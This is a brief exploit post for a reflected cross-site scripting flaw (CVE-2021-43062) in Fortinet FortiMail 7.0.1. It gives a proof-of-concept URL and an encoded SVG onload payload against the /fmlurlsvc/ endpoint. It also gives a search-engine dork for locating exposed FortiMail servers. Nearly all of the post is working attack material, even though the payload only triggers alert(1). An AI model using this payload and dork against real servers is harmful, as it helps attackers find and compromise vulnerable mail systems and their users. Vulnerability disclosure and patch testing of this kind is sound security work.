Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062)

An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.

PoC:
https://example/fmlurlsvc/?=&url=https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E

Payload:
https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E

Dork:
inurl:/fmlurlsvc/

#fortinet #forimail #xss